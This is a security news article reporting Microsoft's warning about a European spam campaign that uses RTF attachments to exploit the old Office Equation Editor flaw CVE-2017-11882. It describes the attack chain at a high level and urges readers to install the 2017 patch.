Home Articles How the New Spam Campaign is Targeting Microsoft Office with Old Malware

How the New Spam Campaign is Targeting Microsoft Office with Old Malware


Recently, Microsoft warned that fresh spam campaign is exploiting old Office vulnerability in Europe. Read on to know more…

Recently, Microsoft issued a security warning regarding a spam campaign that seems to abuse a security vulnerability in its productivity suite – Office. The spam campaign involves sending malicious documents that can infect users when they simply open the attached RTF document. As of now, the spam campaign is targeting European users. Microsoft’s Security Intelligence account made the announcement in a series of tweets recently.

Security Vulnerabilities
According to Microsoft’s security researchers, the ongoing spam campaign includes RTF documents that exploit the Microsoft Office and Wordpad CVE-2017-11882 vulnerability.

The vulnerability CVE-2017-11882 is a codename for a vulnerability in an older version of the Equation Editor component included with Office. Security researchers from Embedi discovered a bug in this older component back in 2017 that allowed hackers to execute code on a user’s device after they opened a weaponized Office file containing a special exploit.

The CVE-2017-11882 vulnerability enables RTF and Word documents to execute commands right when they are opened. The vulnerability was patched back in 2017, but Microsoft claims that it still sees the exploit being used in spam campaigns which have increased in the last several weeks. Microsoft is recommending users to apply security updates.

“An active malware campaign using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit, which allows attackers to automatically run malicious code without requiring user interaction,” Microsoft Security Intelligence tweeted.

According to a report from Recorded Future as well as one from Kaspersky Lab, the CVE-2017-11882 vulnerability was one of the top exploited vulnerabilities of 2018 as hackers continued to prey on users that had yet to update their software.

Modus Operandi
This vulnerability allows attackers to execute code on users’ device without any user interaction. In other words, users can be infected by simply opening the attached document.

Microsoft said that when a user opens an infected attachment, the file will try to execute a number of scripts written in VBScript, PowerShell, PHP, and others to download the ‘payload’. These scripts are generally downloaded from a Pastebin repository.

According to Microsoft, the ‘payload’ that’s download on an infected user’s system is an executable backdoor trojan, programmed to connect to a malicious domain.

Damage Control
The malicious domain has been taken down, but Microsoft says there’s always a possible risk of future campaigns that may use a similar tactic to exploit the vulnerability. Microsoft is now asking all Windows users to install the security update for this vulnerability as soon as possible.

In case you’ve already applied the November 2017 patch, you’re already protected from this vulnerability. This exploit has been used several times, in an effort to target users who may have forgotten to install the software update.

The latest news is that the backdoor trojan’s C&C server has been taken down since Microsoft issued a security alert. However, in order to avoid future exploit, it is wise to patch the vulnerability by updating the November 2017 Patch Tuesday security updates.


Please enter your comment!
Please enter your name here

+ 39 = 41